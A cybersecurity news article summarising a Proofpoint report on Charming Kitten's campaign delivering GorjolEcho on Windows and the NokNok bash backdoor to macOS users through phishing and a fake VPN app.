Charming Kitten Hackers Target Mac Users With New Malware

Cybersecurity researchers have uncovered a new Charming Kitten campaign utilizing a newly identified malware named NokNok. The campaign, which commenced in May, demonstrates the group's adaptation to different infection chains and their growing focus on targeting macOS systems.

Charming Kitten (also known as APT42 or Phosphorus), a threat group linked to Iran, has been involved in over 30 operations across 14 countries since 2015, according to Mandiant. The group has gained popularity for its persistent attacks on diplomats, government officials, and foreign policy experts.

According to a report published on July 6 by Proofpoint, Charming Kitten has changed their tactics in their latest campaign by moving away from using harmful Microsoft Word documents with macros. Instead, they are now using LNK files as the infection method. These LNK files act as carriers for the malware payloads, marking a departure from their usual techniques.

The group begins their attacks by pretending to be nuclear experts and focusing on individuals who show a strong interest in Middle Eastern affairs and nuclear security. They employ carefully crafted phishing emails to engage their targets, often assuming multiple personas to make their conversations seem more credible.

Charming Kitten targets Windows-based systems by sending a malicious link leading to a Google Script macro. This redirects victims to a Dropbox URL hosting a password-protected RAR archive containing a dropper with PowerShell code and an LNK file. These components work together to stage the malware from a cloud hosting provider. The final payload, GorjolEcho backdoor, allows remote command execution. To avoid detection, GorjolEcho opens a decoy PDF document relevant to prior conversations, reducing suspicion.

Upon realizing that their initial malware could not run on macOS, Charming Kitten adapted their strategy. They targeted macOS users by sending a link to a fake RUSI (Royal United Services Institute) VPN app hosted on "library-store.camdvr.org." This ZIP archive contains a customized Mac application disguised as a VPN client. Upon execution, the app invokes a bash script called NokNok, establishing a backdoor on the victim's system.

NokNok, featuring four discrete modules, collects system information such as the OS version, running processes, installed applications, and network details. This information is then encrypted, base64 encoded, and exfiltrated to the threat actor's command and control (C2) server.

Charming Kitten's ability to adapt its infection chains using various cloud hosting providers demonstrates its persistence and determination to carry out cyber espionage operations. The group's continuous evolution underscores the importance of a strong defense and collaborative efforts within the cybersecurity community to thwart even the most advanced adversaries.